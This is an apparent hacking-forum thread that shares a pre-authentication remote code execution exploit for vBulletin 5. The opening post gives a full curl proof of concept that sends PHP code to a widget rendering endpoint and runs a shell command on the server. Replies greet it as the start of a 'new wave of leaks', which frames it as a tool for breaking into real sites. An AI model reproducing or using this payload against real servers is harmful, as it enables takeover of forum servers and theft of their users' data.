vBulletin5 pre-auth 0day RCE exploit
by umerkhan - August 10, 2020 at 04:14 PM
#1
A researcher has published his research about vBulletin5 including a new  pre-auth 0day RCE exploit.

https://blog.exploitee.rs/2020/exploitin...atch-fail/


POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#2
New leaks coming i guess.
#3
Seems good and simple. Thanks.
This forum account is currently banned. Ban Length: Permanent (N/A).
Ban Reason: Continued using monetized links after being warned / Multi accounting (hacxx)
#4
(August 10, 2020 at 04:49 PM)Zelley Wrote: New leaks coming i guess.

Yea, new wave of leaks :3

Possibly Related Threads…
Thread Author Replies Views Last Post
Laravel <= v8.4.2 debug mode: RCE umerkhan 5 364 January 28, 2021 at 11:48 PM
Last Post: L33THACKER105
Chrome/Brave 0day in-the-wild DbhUyDhj1 3 307 January 28, 2021 at 08:53 PM
Last Post: DbhUyDhj1
Journalists Hacked with Suspected NSO Group iMessage ‘Zero-Click’ Exploit QIk5SPgGPm 0 271 December 22, 2020 at 05:30 AM
Last Post: QIk5SPgGPm

 Users browsing this thread: 1 Guest(s)